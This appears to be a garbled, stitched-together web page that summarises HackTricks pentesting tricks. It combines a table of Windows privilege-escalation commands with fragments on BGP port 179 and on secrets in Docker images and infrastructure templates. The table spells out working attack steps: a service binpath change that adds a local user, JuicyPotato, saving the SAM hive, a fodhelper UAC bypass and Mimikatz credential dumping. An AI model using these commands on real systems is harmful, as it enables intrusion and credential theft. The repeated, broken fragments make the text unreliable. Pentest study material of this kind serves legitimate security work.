| # | Trick | Command / Technique | |---|-------|----------------------| | 31 | AlwaysInstallElevated MSI | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer | | 32 | Unquoted service paths | wmic service get name,displayname,pathname,startmode | | 33 | Weak service permissions (sc.exe) | sc config SERVICE binpath="cmd.exe /c net user hacker pass /add" | | 34 | SeImpersonate (Potato家族) | JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" | | 35 | Saved RDP credentials | cmdkey /list → runas /savecred | | 36 | SAM & SYSTEM backup | reg save hklm\sam sam.save | | 37 | Writable %PATH% folders | where.exe check + drop whoami.exe | | 38 | PrintNightmare (CVE-2021-34527) | MS-RPRN → SharpPrintNightmare.exe | | 39 | UAC bypass – fodhelper | reg add HKCU\Software\Classes\ms-settings\shell\open\command | | 40 | Logon scripts from registry | reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" | | ... | ... | ... | | 60 | Mimikatz sekurlsa | sekurlsa::logonpasswords |
Analyze the banner of the BGP service to identify the device type and vendor.
But with thousands of pages, where do you focus? We’ve distilled from HackTricks into this solid post. hacktricks 179 best
Note: This is a long list; use Ctrl/Cmd+F to jump to sections.
Attacking Docker images on registries - Pull images to inspect layers for embedded keys or secrets. | # | Trick | Command / Technique
, the fundamental routing protocol that acts as the "glue" holding the global internet together. When assessing an infrastructure's perimeter, discovering an exposed Port 179 during an nmap scan represents a high-severity architectural risk. Unlike standard web protocols, BGP dictates traffic paths between Autonomous Systems (AS). Misconfigurations or lacks of authentication on this port can allow attackers to intercept, manipulate, or completely blackhole enterprise and carrier-grade traffic.
HackTricks Port 179: Best Pentesting Practices for Border Gateway Protocol (BGP) | | 60 | Mimikatz sekurlsa | sekurlsa::logonpasswords
Cloudformation / ARM template secrets in repos - Search IaC for embedded secrets; use truffleHog.